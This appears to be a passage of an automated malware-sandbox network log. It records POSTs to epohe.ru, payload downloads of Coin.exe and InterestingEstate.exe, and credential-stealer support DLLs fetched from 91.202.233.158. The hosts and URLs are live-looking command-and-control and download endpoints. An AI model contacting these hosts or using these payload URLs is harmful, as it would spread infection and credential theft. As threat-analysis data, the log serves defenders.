Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dkyucoyaekdk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aipiphxycclwh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: epohe.ru
Source: global traffic	HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nbvjehgoajlapmsg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: epohe.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.169.44

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E929BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

25_2_00E929BA

Source: global traffic	HTTP traffic detected: GET /Coin.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.darkviolet-alpaca-923878.hostingersite.com
Source: global traffic	HTTP traffic detected: GET /Photo/InterestingEstate.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 94.228.169.44
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/sqlite3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/freebl3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/mozglue.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/msvcp140.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/nss3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/softokn3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/vcruntime140.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: epohe.ru
Source: global traffic	DNS traffic detected: DNS query: ycMmBvpGeMcYHBMfFqkIrUsoh.ycMmBvpGeMcYHBMfFqkIrUsoh
Source: global traffic	DNS traffic detected: DNS query: www.darkviolet-alpaca-923878.hostingersite.com

Source: unknown

HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxryfrjxsorxwjj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: epohe.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 01 Sep 2024 16:27:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
